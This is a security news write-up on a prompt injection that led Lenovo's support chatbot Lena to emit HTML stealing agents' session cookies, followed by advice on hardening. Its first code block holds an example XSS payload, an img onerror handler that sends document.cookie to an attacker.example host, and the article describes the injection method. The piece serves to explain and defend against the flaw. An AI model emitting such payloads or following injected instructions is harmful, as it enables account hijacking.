Lenovo’s AI-powered customer service chatbot, Lena, has been found vulnerable to a cleverly crafted prompt injection that allowed attackers to steal active session cookies and hijack support agent accounts. Cybernews researchers demonstrated how a single 400-character prompt, disguised as a regular request (such as asking for product specs), could trick Lena into outputting HTML containing malicious script instructions that, when rendered by a browser, exfiltrated session cookies to an external server. This opens the door to serious risks: impersonating agents, running system commands, installing backdoors, and moving laterally across the network. Lenovo has since patched the flaw, but experts warn the episode highlights a broader issue: the tendency of chatbots to obey any instruction they are given unless aggressive sanitization and verification measures are enforced.
Sources: TechRadar, Security Boulevard, WebPro News
Key Takeaways
– Single-prompt XSS exploit: A single cleverly hidden instruction inside a normal-sounding query triggered a cross-site scripting attack that leaked session cookies.
– Broader AI vulnerability: The case underscores how generative AI systems, if not correctly sandboxed and filtered, can turn from helpful agents into internal security threats.
– Urgent need for hardening: The incident serves as a warning for enterprises to implement strict input/output sanitization, robust verification, and sandboxing for AI-driven customer support systems.
In-Depth
Lenovo’s Lena chatbot was simply doing its job—answering customer queries—until researchers at Cybernews turned its helpfulness into a vulnerability. They crafted a 400-character prompt: part innocuous customer request, part hidden malicious payload.
By instructing the chatbot to format its response as HTML, they embedded a payload that caused the agent’s browser to send session cookies to a remote server when a planted image failed to load. That session cookie was essentially a golden key: it allowed attackers to impersonate customer support agents without needing login credentials, potentially enabling them to access private chats, execute system-level commands, or even plant backdoors.
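To make the mechanism concrete, here is a minimal, hypothetical sketch of the vulnerable pattern, not Lenovo’s actual code: a support console that writes the chatbot’s reply straight into the page with innerHTML, so a broken image tag the model was coaxed into emitting runs its error handler in the agent’s browser. The renderReplyUnsafely function, the chat-pane element, and the attacker.example URL are all illustrative assumptions.

```typescript
// Hypothetical rendering path in a support console (illustrative only, not Lenovo's implementation).
// The chatbot reply is dropped into the DOM as-is, so any HTML the model was
// tricked into emitting becomes live markup in the agent's browser.
function renderReplyUnsafely(reply: string): void {
  const pane = document.getElementById("chat-pane");
  if (!pane) return;
  pane.innerHTML = reply; // vulnerable: model output treated as trusted HTML
}

// Rough shape of the kind of payload a prompt injection can coax out of the model:
// an image that cannot load, whose error handler forwards the session cookie to an
// attacker-controlled endpoint (attacker.example is a placeholder).
const injectedReply = `
  <p>Here are the product specs you asked about.</p>
  <img src="nonexistent.png"
       onerror="fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie))">
`;

// Assuming the page has a #chat-pane element and the session cookie is not HttpOnly,
// the error handler fires and the cookie leaves the browser.
renderReplyUnsafely(injectedReply);
```

The key detail is that innerHTML never executes a literal script tag, but it does attach event handlers such as onerror, which is why an image that fails to load is a classic vehicle for this kind of injection.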
Lenovo has patched the vulnerability, but what makes this episode alarming is how easily it was triggered. Large language models are inherently “people-pleasers,” apt to follow any instruction, even a malicious one, unless confined by rigorous guardrails. As AI tools permeate enterprise workflows, the incident underscores how important it is to treat AI output as untrusted: sanitize it before it is rendered, and vet generated content before it reaches other systems. Above all, enterprises should adopt a “never trust, always verify” stance toward AI responses, just as they would toward any other external input to their systems.
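As one illustration of that stance, the sketch below shows a minimal hardening pattern under assumed names (renderReplySafely, escapeHtml, the chat-pane element); it is not Lenovo’s fix. The idea is to render model output as plain text so any markup stays inert, escape it if it must pass through an HTML pipeline, and keep session cookies out of script reach with the HttpOnly flag so even a missed injection cannot read them.

```typescript
// Minimal hardening sketch (function and element names are assumptions, not Lenovo's code).

// 1) Render model output as text, never as markup: the browser escapes it, so an
//    embedded <img onerror=...> stays inert text instead of executing.
function renderReplySafely(reply: string): void {
  const pane = document.getElementById("chat-pane");
  if (!pane) return;
  const bubble = document.createElement("div");
  bubble.textContent = reply;
  pane.appendChild(bubble);
}

// 2) If model output must pass through an HTML pipeline, escape it first and only
//    re-introduce formatting from an explicit allow-list, rather than trusting
//    whatever the model produced.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// 3) Server side, keep session cookies invisible to scripts so document.cookie has
//    nothing to leak even if an injection slips through (header shown purely as an example):
// Set-Cookie: session=...; HttpOnly; Secure; SameSite=Strict
```

None of these steps blocks prompt injection itself; they limit the blast radius so that a manipulated response cannot execute in the browser or walk away with credentials.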

